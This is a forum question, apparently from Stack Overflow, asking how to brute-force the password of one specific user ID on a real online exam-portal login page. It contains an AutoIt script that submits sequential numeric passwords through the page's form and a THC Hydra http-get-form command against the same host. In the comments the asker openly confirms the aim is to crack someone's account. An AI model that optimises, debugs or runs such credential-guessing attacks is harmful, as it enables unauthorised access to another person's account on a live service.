# How to brute force username password in html page

Tags: php, http-post, brute-force, hydra

I have one correct username and list of possible 6000 password for that username.
I wan to try all possible passwords for a particular username in following website.

https://cdn.digialm.com//EForms/configuredHtml/756/5055/login.html

I have creates a AutoIt script to do so but it takes too much time for single attempt.

```
> #include <IE.au3>
> #include <String.au3>
> #include <FileConstants.au3>
> #include <MsgBoxConstants.au3>
> #include <WinAPIFiles.au3>
> 
> Call ("signIn")
> 
> Func signIn()
> 
> 
> 
> Global $oIE =
> _IECreate("https://cdn.digialm.com//EForms/configuredHtml/756/5055/login.html")
> 
> # Loop From here $file = FileOpen("log.txt", 2)
> 
> For $i = 600000 To 9999999    Local $username =
> _IEGetObjByName($oIE,"userid")    Local $password = _IEGetObjByName($oIE,"confData")  Local $button = _IEGetObjByName($oIE,"button1")     $string = String($i)    FileWriteLine($file, $string);
>   _IEformElementSetValue($username,"6269644")
>   _IEformElementSetValue($password,$string)   _IEAction($button,"click")
>   Sleep(1000) Next    ;
> #to here EndFunc
```

Can anybody tell me how to do it in faster way.

I tried hydra also but it every time returns that all passwords in files are correct.
I don't know what is wrong in this syntax.

```
> D:\Thc Hydra Master>hydra -l 6269618 -P password.txt cdn.digialm.com
> http-get-fo rm
> "/EForms/loginAction.do?subAction=ValidateUser:userid=^USER^&confData=^PASS^:
> combination does not"
```

Please help.

Comment: Are you asking for help to crack a login system?

Comment: @mickmackusa yes

Comment: @mickmackusa i just want to crack this page. I have username and want to open account page.